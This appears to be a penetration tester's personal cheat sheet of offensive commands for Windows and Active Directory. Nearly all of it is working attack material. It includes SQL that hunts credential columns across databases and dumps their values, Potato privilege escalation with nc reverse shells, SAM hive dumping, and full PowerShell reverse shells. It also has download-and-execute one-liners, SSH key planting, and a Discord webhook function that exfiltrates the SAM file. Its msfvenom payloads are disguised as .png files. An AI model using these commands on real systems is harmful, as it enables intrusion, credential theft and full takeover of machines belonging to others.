IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits; CREATE TABLE #hits(database_name sysname, schema_name sysname, table_name sysname, column_name sysname); DECLARE @db sysname,@sql nvarchar(max); DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT name FROM sys.databases WHERE state=0 AND database_id NOT IN (1,2,3,4) AND HAS_DBACCESS(name)=1; OPEN c; FETCH NEXT FROM c INTO @db; WHILE @@FETCH_STATUS=0 BEGIN SET @sql=N'USE '+QUOTENAME(@db)+N'; INSERT INTO #hits(database_name,schema_name,table_name,column_name) SELECT DB_NAME(),s.name,t.name,c.name FROM sys.tables t JOIN sys.schemas s ON s.schema_id=t.schema_id JOIN sys.columns c ON c.object_id=t.object_id WHERE c.name LIKE ''%pass%'' OR c.name LIKE ''%pwd%'' OR c.name LIKE ''%secret%'' OR c.name LIKE ''%token%'' OR c.name LIKE ''%key%'' OR c.name LIKE ''%credential%'' OR c.name LIKE ''%auth%'' OR c.name LIKE ''%conn%'' OR c.name LIKE ''%apikey%'';'; EXEC sys.sp_executesql @sql; FETCH NEXT FROM c INTO @db; END; CLOSE c; DEALLOCATE c; SELECT * FROM #hits ORDER BY database_name,schema_name,table_name,column_name;

Find passwords with example:
IF OBJECT_ID('tempdb..##results') IS NOT NULL DROP TABLE ##results; CREATE TABLE ##results(database_name sysname, schema_name sysname, table_name sysname, column_name sysname, sample_values nvarchar(max)); DECLARE @db sysname, @sql nvarchar(max); DECLARE c CURSOR LOCAL FAST_FORWARD FOR SELECT name FROM sys.databases WHERE state=0 AND database_id NOT IN (1,2,3,4) AND HAS_DBACCESS(name)=1; OPEN c; FETCH NEXT FROM c INTO @db; WHILE @@FETCH_STATUS=0 BEGIN SET @sql=N'USE '+QUOTENAME(@db)+N'; DECLARE @s sysname, @t sysname, @col sysname, @fullsql nvarchar(max), @samples nvarchar(max); DECLARE cc CURSOR FOR SELECT s.name, t.name, c.name FROM sys.tables t JOIN sys.schemas s ON s.schema_id=t.schema_id JOIN sys.columns c ON c.object_id=t.object_id WHERE c.name LIKE ''%pass%'' OR c.name LIKE ''%pwd%'' OR c.name LIKE ''%secret%'' OR c.name LIKE ''%token%'' OR c.name LIKE ''%key%'' OR c.name LIKE ''%credential%'' OR c.name LIKE ''%auth%'' OR c.name LIKE ''%conn%'' OR c.name LIKE ''%apikey%''; OPEN cc; FETCH NEXT FROM cc INTO @s, @t, @col; WHILE @@FETCH_STATUS=0 BEGIN SET @samples=''''; BEGIN TRY SET @fullsql=N''USE '+QUOTENAME(@db)+N'; SELECT @out=STUFF((SELECT '''', '''' + ISNULL(CAST(''+QUOTENAME(@col)+N'' AS NVARCHAR(500)),''''NULL'''') FROM ''+QUOTENAME(@s)+N''.''+QUOTENAME(@t)+N'' ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 20 ROWS ONLY FOR XML PATH('''''''')), 1, 2, '''''''')''; EXEC sp_executesql @fullsql, N''@out nvarchar(max) OUTPUT'', @samples OUTPUT; END TRY BEGIN CATCH SET @samples=''ERROR''; END CATCH; INSERT INTO ##results VALUES(DB_NAME(), @s, @t, @col, @samples); FETCH NEXT FROM cc INTO @s, @t, @col; END; CLOSE cc; DEALLOCATE cc;'; EXEC(@sql); FETCH NEXT FROM c INTO @db; END; CLOSE c; DEALLOCATE c; SELECT * FROM ##results ORDER BY database_name,schema_name,table_name,column_name; DROP TABLE ##results;

Change password remotely:

nxc smb 10.100.100.10 -u user -p pass -M change-password -o NEWPASS=NewPassword
changepasswd.py 'domain.local/user@10.100.100.10' -p rpc-samr (Itself)
bloodyAD -d domain.local -u 'user' -p 'pass' --host 10.100.100.10 set password "sam" "0xdf0xdf!" (For another user)

Logon with existing ticket:

Enter-PSSession -ComputerName tech-dc
winrs -r:tech-dc cmd

Juicy Potato:

certutil.exe -urlcache -split -f "http://10.10.14.5:1335/CLSID.list" CLSID.list
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/test.bat" test.bat
certutil.exe -urlcache -split -f "http://10.10.14.5:1335/JuicyPotato.exe" JuicyPotato.exe
type result.log  # look for "NT SYSTEM"
juicypotato.exe -l 1234 -p nc.exe -a " -nv 10.10.14.5 1339 -e cmd.exe" -t * -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
.\JuicyPotato.exe -l 443 -p c:\windows\system32\cmd.exe -a "/c c:\Users\charlotte\Desktop\nc.exe -e cmd.exe 192.168.45.245 443" -t *

God Potato:

iwr('http://192.168.45.245:8000/GodPotato-NET4.exe') -OutFile GodPotato-NET4.exe
nc -vnlp 443
.\GodPotato-NET4.exe -cmd "cmd /c nc.exe -e powershell.exe 192.168.45.245 443" #Reverse Shell
or
.\GodPotato-NET4.exe -cmd "net user /add kalihacker kalihacker123"        #Add Admin User
.\GodPotato-NET4.exe -cmd "net localgroup administrators /add kalihacker" #Add Admin User
or
.\GodPotato-NET4.exe -cmd "net user administrator kalihacker123" #Change Admin password

Registry Hive Dump (SAM/SYSTEM/SECURITY)

reg save hklm\sam 'C:\Windows\Temp\sam'
reg save hklm\system 'C:\Windows\Temp\system'
reg save hklm\security 'C:\Windows\Temp\security'
impacket-secretsdump -sam sam -system system -security security local

Shells & TTY Improvements

Webshell → PowerShell reverse (Windows):

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("IP",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Upgrade TTY (Linux):

python3 -c 'import pty; pty.spawn("/bin/bash")'
# then:
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Get Stable SSH Connection:

# Your Machine:
$ ssh-keygen -t rsa -b 4096
$ cat oscpb.pub

# Target Machine:
$ mkdir -p ~/.ssh
$ chmod 700 ~/.ssh
$ echo "ssh-rsa AAAAB3... your@email" >> ~/.ssh/authorized_keys
$ chmod 600 ~/.ssh/authorized_keys

$ ssh -i oscpb user@target_ip

More SSH Keys things:

/home/<USER>/.ssh/authorized_keys #User can be obtained in /etc/passwd
/home/<USER>/.ssh/id_ecdsa  (the key type to look for can be read from the authorized_keys entries above)
ssh2john priv_key > key.hash
john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i priv_key <USER>@<IP> -p <PORT>

File Transfer & Collection

Downloaders (Windows):

msiexec /q /i https://github.com/kalinathalie/qualquercoisa.txt
certutil.exe -urlcache -split -f "https://github.com/kalinathalie/qualquercoisa.txt" c:\windows\temp\agoravai.txt
powershell -c "iwr('https://github.com/kalinathalie/qualquercoisa.txt')|iex"
powershell -c "iwr('http://10.10.14.3/file.exe') -OutFile file.exe"
powershell -nop -exec bypass -w 1 iex(New-Object net.webclient).DownloadString('http://10.10.14.3/file.exe')
powershell wget http://ip/file.exe -O file.exe

Zip a directory (Windows PowerShell):

Add-Type -AssemblyName System.IO.Compression.FileSystem
[IO.Compression.ZipFile]::CreateFromDirectory('D:/OpaOpa', 'C:/Temp/OpaOpa.zip')

Search files (Windows):

Get-ChildItem C:\ -recurse -include "access.log"
FINDSTR /L /S /I /N /C:"algo" *.txt
findstr /s /m /c:"password" *

Encode payload to PowerShell Base64

echo -n 'iex "$env:TEMP\shell.ps1"' | iconv -t UTF-16LE | base64 -w0

Upload to Discord (Windows function):

function Upload-Discord {
    [CmdletBinding()]
    param(
      [parameter(Position=0,Mandatory=$False)][string]$file,
      [parameter(Position=1,Mandatory=$False)][string]$text,
      [parameter(Mandatory=$False)][string]$hookurl = $env:WEBHOOK   # was never defined in the original
    )
    if (-not [string]::IsNullOrEmpty($file) -and (Test-Path $file)) {
        # multipart upload of the file (curl.exe ships with Windows 10 1803+)
        curl.exe -s -F "files[0]=@$file" -F "content=$text" $hookurl | Out-Null
        return
    }
    $Body = @{ 'username' = $env:username; 'content' = $text }
    if (-not ([string]::IsNullOrEmpty($text))) {
        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
    }
}
Upload-Discord -file "C:\Windows\System32\config\SAM" -text "Key-File"

Upload via Discord (Linux):

# from cloned repo
./discord.sh --webhook-url="$WEBHOOK" --file file.txt

Simple Flask upload receiver (Linux):

import os
from flask import Flask, request
from werkzeug.utils import secure_filename

UPLOAD_DIR = os.path.abspath("uploads")   # keep uploads out of the working directory
os.makedirs(UPLOAD_DIR, exist_ok=True)
app = Flask(__name__)

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return 'No file part', 400
    file = request.files['file']
    if file.filename == '':
        return 'No selected file', 400
    # secure_filename strips path separators, so a crafted name cannot escape UPLOAD_DIR
    name = secure_filename(file.filename) or 'upload.bin'
    file.save(os.path.join(UPLOAD_DIR, name))
    return f'File uploaded successfully as {name}'

if __name__ == '__main__':
    # debug=False: the Werkzeug debugger must not be reachable on 0.0.0.0
    app.run(host='0.0.0.0', debug=False)

Client side (Windows):

curl.exe -X POST -F "file=@C:\Docs\arquivo.pdf" http://10.10.14.6:5000/upload

Metasploit / Payloads

Install Metasploit (Linux):

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

Listener (HTTPS) and Payload (Windows):

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.100.100.10
set LPORT 4444
run
msfvenom -p windows/meterpreter/reverse_https LHOST=10.100.100.10 LPORT=4444 -f exe > agoravai.png
# Transfer, then:
Rename-Item -Path "c:\windows\temp\agoravai2.png" -NewName "agoravai2.exe"
cd c:\windows\temp
.\agoravai2.exe

# Alt output type
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.100.100.10 LPORT=4444 -f msi > 100security.png

or
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.229 LPORT=1337 -f exe -o file.exe
nc -vnlp 1337

Unicorn helper (MSHTA payload):

https://github.com/karemfaisal/SMUC/blob/master/MSHTA/Mshta.md
python3 unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
# In msfconsole:
use multi/handler
set payload windows/meterpreter/reverse_https
run -j

BloodHound (Linux)

/bin/neo4j start
bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 -dc DC01.feast.com -d feast.com -v -c all (The best)
bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 --disable-autogc -d domain.local -v
# NTLM auth example:
bloodhound-python -d domain.yzx -u 'user'@domain.yzx -p 'pass' --auth-method ntlm -c all,LoggedOn -ns 192.168.224.97 --dns-timeout 10 -dc DC01.secura.yzx 

bloodhound

DNS dump helper (Linux):

python3 dnsdump.py -u 'user' -p 'senha' DC

Misc Utilities

Work around blocked APT downloads (mirror list + custom User-Agent):

https://http.kali.org/README?mirrorlist
sudo tee /etc/apt/apt.conf.d/99ua <<'EOF'
Acquire::https::User-Agent "curl/8.15.0";
Acquire::http::User-Agent  "curl/8.15.0";
Acquire::http::Pipeline-Depth "0";
Acquire::ForceIPv4 "true";
Acquire::https::Timeout "60";
EOF

sudo apt -o Debug::Acquire::https=true update

Execute EXE and save output (Windows):

cmd /c "file.exe > output.txt"

Windows → PowerShell switching (CMD to PS):

CMD -> PowerShell (powershell.exe)

Pro tip: port-scan from a Windows host with minimal tooling (bash + curl only):

# curl exit 7 = connection refused, 28 = timeout; anything else means something answered
for x in {1..4096}; do
  curl -s -m 2 172.16.22.1:"$x" >/dev/null 2>&1
  rc=$?   # read the exit code once; a second [ ] test would overwrite $?
  [ "$rc" -ne 7 ] && [ "$rc" -ne 28 ] && echo "[+] Port $x open"
done

Quick testssl example:

./testssl.sh --color 3 --warnings=batch --quiet --ip one -s -p -U -E https://www.google.com

End of organized notes.
